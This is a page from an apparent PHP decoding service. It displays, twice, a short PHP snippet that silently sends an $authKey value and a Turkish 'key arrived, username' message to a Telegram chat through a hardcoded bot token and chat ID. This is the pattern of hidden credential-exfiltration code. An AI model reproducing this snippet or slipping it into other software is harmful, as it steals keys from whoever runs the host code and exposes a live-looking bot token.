Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php error_reporting(0); ..

Decoded Output download

   <?php 
												 
												 
												 
error_reporting(0); 
                                                                                                 
                                                                                                 
$Token = "6417084108:AAEC9ReQOe7AV7l4wVOfVgYmUwbMIx3qx6Q"; 
$data = [ 
                                                                                                       
'text' => ' 
KEYY GELD         
                                                                                                         
                                                                                                     
                                                                                                     
Kullanc Ad : '.$authKey.' 
-------------------------------- 
 
 
                                                                                                 
                                                                                                 
', 
                                                                                                      
'chat_id' => -4004380836  
]; 
$response = file_get_contents("https://api.telegram.org/bot$Token/sendMessage?" .http_build_query($data) ); 
                                                                                                  
                                                                                                 
?> 

Did this file decode correctly?

Original Code

   <?php
												
												
												
error_reporting(0);
                                                                                                
                                                                                                
$Token = "6417084108:AAEC9ReQOe7AV7l4wVOfVgYmUwbMIx3qx6Q";
$data = [
                                                                                                      
'text' => '
KEYY GELD        
                                                                                                        
                                                                                                    
                                                                                                    
Kullanc Ad : '.$authKey.'
--------------------------------


                                                                                                
                                                                                                
',
                                                                                                     
'chat_id' => -4004380836 
];
$response = file_get_contents("https://api.telegram.org/bot$Token/sendMessage?" .http_build_query($data) );
                                                                                                 
                                                                                                
?>

Function Calls

None

Variables

None

Stats

MD5 3167de5c09e8fd4ff1479d39432e06b3
Eval Count 0
Decode Time 49 ms